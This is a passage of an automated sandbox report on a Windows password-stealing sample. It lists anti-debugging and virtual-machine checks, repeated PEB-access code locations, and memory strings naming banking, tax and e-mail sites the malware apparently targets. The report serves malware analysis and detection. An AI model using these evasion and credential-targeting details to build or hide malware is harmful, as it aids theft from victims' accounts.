            Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: c23yo28O4.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: c23yo28O4.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: c23yo28O4.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: c23yo28O4.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00eri
            Source: c23yo28O4.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D1C0 rdtsc 6_2_0334D1C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004175A3 LdrLoadDll,6_2_004175A3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FF32A mov eax, dword ptr fs:[00000030h]6_2_032FF32A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339132D mov eax, dword ptr fs:[00000030h]6_2_0339132D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339132D mov eax, dword ptr fs:[00000030h]6_2_0339132D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C7330 mov eax, dword ptr fs:[00000030h]6_2_032C7330
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330A30B mov eax, dword ptr fs:[00000030h]6_2_0330A30B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330A30B mov eax, dword ptr fs:[00000030h]6_2_0330A30B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330A30B mov eax, dword ptr fs:[00000030h]6_2_0330A30B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC310 mov ecx, dword ptr fs:[00000030h]6_2_032CC310
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335930B mov eax, dword ptr fs:[00000030h]6_2_0335930B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335930B mov eax, dword ptr fs:[00000030h]6_2_0335930B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335930B mov eax, dword ptr fs:[00000030h]6_2_0335930B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F0310 mov ecx, dword ptr fs:[00000030h]6_2_032F0310
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337437C mov eax, dword ptr fs:[00000030h]6_2_0337437C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D7370 mov eax, dword ptr fs:[00000030h]6_2_032D7370
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D7370 mov eax, dword ptr fs:[00000030h]6_2_032D7370
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D7370 mov eax, dword ptr fs:[00000030h]6_2_032D7370
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F367 mov eax, dword ptr fs:[00000030h]6_2_0338F367
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD34C mov eax, dword ptr fs:[00000030h]6_2_032CD34C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD34C mov eax, dword ptr fs:[00000030h]6_2_032CD34C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]6_2_0335035C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]6_2_0335035C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]6_2_0335035C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335035C mov ecx, dword ptr fs:[00000030h]6_2_0335035C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]6_2_0335035C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]6_2_0335035C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339A352 mov eax, dword ptr fs:[00000030h]6_2_0339A352
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5341 mov eax, dword ptr fs:[00000030h]6_2_033A5341
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]6_2_03352349
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9353 mov eax, dword ptr fs:[00000030h]6_2_032C9353
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9353 mov eax, dword ptr fs:[00000030h]6_2_032C9353
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F33A5 mov eax, dword ptr fs:[00000030h]6_2_032F33A5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033033A0 mov eax, dword ptr fs:[00000030h]6_2_033033A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033033A0 mov eax, dword ptr fs:[00000030h]6_2_033033A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F438F mov eax, dword ptr fs:[00000030h]6_2_032F438F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F438F mov eax, dword ptr fs:[00000030h]6_2_032F438F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CE388 mov eax, dword ptr fs:[00000030h]6_2_032CE388
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CE388 mov eax, dword ptr fs:[00000030h]6_2_032CE388
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CE388 mov eax, dword ptr fs:[00000030h]6_2_032CE388
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A539D mov eax, dword ptr fs:[00000030h]6_2_033A539D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0332739A mov eax, dword ptr fs:[00000030h]6_2_0332739A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0332739A mov eax, dword ptr fs:[00000030h]6_2_0332739A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C8397 mov eax, dword ptr fs:[00000030h]6_2_032C8397
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C8397 mov eax, dword ptr fs:[00000030h]6_2_032C8397
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C8397 mov eax, dword ptr fs:[00000030h]6_2_032C8397
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A53FC mov eax, dword ptr fs:[00000030h]6_2_033A53FC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]6_2_032E03E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033063FF mov eax, dword ptr fs:[00000030h]6_2_033063FF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE3F0 mov eax, dword ptr fs:[00000030h]6_2_032EE3F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE3F0 mov eax, dword ptr fs:[00000030h]6_2_032EE3F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE3F0 mov eax, dword ptr fs:[00000030h]6_2_032EE3F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F3E6 mov eax, dword ptr fs:[00000030h]6_2_0338F3E6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338B3D0 mov ecx, dword ptr fs:[00000030h]6_2_0338B3D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]6_2_032DA3C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]6_2_032DA3C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]6_2_032DA3C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]6_2_032DA3C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]6_2_032DA3C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]6_2_032DA3C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]6_2_032D83C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]6_2_032D83C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]6_2_032D83C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]6_2_032D83C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338C3CD mov eax, dword ptr fs:[00000030h]6_2_0338C3CD
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C823B mov eax, dword ptr fs:[00000030h]6_2_032C823B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5227 mov eax, dword ptr fs:[00000030h]6_2_033A5227
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03307208 mov eax, dword ptr fs:[00000030h]6_2_03307208
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03307208 mov eax, dword ptr fs:[00000030h]6_2_03307208
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03311270 mov eax, dword ptr fs:[00000030h]6_2_03311270
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03311270 mov eax, dword ptr fs:[00000030h]6_2_03311270
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C826B mov eax, dword ptr fs:[00000030h]6_2_032C826B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]6_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D4260 mov eax, dword ptr fs:[00000030h]6_2_032D4260
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D4260 mov eax, dword ptr fs:[00000030h]6_2_032D4260
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D4260 mov eax, dword ptr fs:[00000030h]6_2_032D4260
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339D26B mov eax, dword ptr fs:[00000030h]6_2_0339D26B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339D26B mov eax, dword ptr fs:[00000030h]6_2_0339D26B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F9274 mov eax, dword ptr fs:[00000030h]6_2_032F9274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]6_2_032C9240
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]6_2_032C9240
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338B256 mov eax, dword ptr fs:[00000030h]6_2_0338B256
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338B256 mov eax, dword ptr fs:[00000030h]6_2_0338B256
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D6259 mov eax, dword ptr fs:[00000030h]6_2_032D6259
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA250 mov eax, dword ptr fs:[00000030h]6_2_032CA250
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330724D mov eax, dword ptr fs:[00000030h]6_2_0330724D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033592BC mov eax, dword ptr fs:[00000030h]6_2_033592BC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033592BC mov eax, dword ptr fs:[00000030h]6_2_033592BC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033592BC mov ecx, dword ptr fs:[00000030h]6_2_033592BC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033592BC mov ecx, dword ptr fs:[00000030h]6_2_033592BC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]6_2_032E52A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]6_2_032E52A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]6_2_032E52A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]6_2_032E52A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]6_2_033662A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033662A0 mov ecx, dword ptr fs:[00000030h]6_2_033662A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]6_2_033662A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]6_2_033662A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]6_2_033662A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]6_2_033662A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033672A0 mov eax, dword ptr fs:[00000030h]6_2_033672A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033672A0 mov eax, dword ptr fs:[00000030h]6_2_033672A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]6_2_033992A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]6_2_033992A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]6_2_033992A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]6_2_033992A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330329E mov eax, dword ptr fs:[00000030h]6_2_0330329E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330329E mov eax, dword ptr fs:[00000030h]6_2_0330329E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330E284 mov eax, dword ptr fs:[00000030h]6_2_0330E284
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330E284 mov eax, dword ptr fs:[00000030h]6_2_0330E284
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03350283 mov eax, dword ptr fs:[00000030h]6_2_03350283
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03350283 mov eax, dword ptr fs:[00000030h]6_2_03350283
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03350283 mov eax, dword ptr fs:[00000030h]6_2_03350283
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5283 mov eax, dword ptr fs:[00000030h]6_2_033A5283
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F2F8 mov eax, dword ptr fs:[00000030h]6_2_0338F2F8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E02E1 mov eax, dword ptr fs:[00000030h]6_2_032E02E1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E02E1 mov eax, dword ptr fs:[00000030h]6_2_032E02E1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E02E1 mov eax, dword ptr fs:[00000030h]6_2_032E02E1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C92FF mov eax, dword ptr fs:[00000030h]6_2_032C92FF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A52E2 mov eax, dword ptr fs:[00000030h]6_2_033A52E2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D92C5 mov eax, dword ptr fs:[00000030h]6_2_032D92C5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D92C5 mov eax, dword ptr fs:[00000030h]6_2_032D92C5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]6_2_032DA2C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]6_2_032DA2C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]6_2_032DA2C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]6_2_032DA2C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]6_2_032DA2C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FF2D0 mov eax, dword ptr fs:[00000030h]6_2_032FF2D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FF2D0 mov eax, dword ptr fs:[00000030h]6_2_032FF2D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB2D3 mov eax, dword ptr fs:[00000030h]6_2_032CB2D3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB2D3 mov eax, dword ptr fs:[00000030h]6_2_032CB2D3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB2D3 mov eax, dword ptr fs:[00000030h]6_2_032CB2D3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03300124 mov eax, dword ptr fs:[00000030h]6_2_03300124
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D1131 mov eax, dword ptr fs:[00000030h]6_2_032D1131
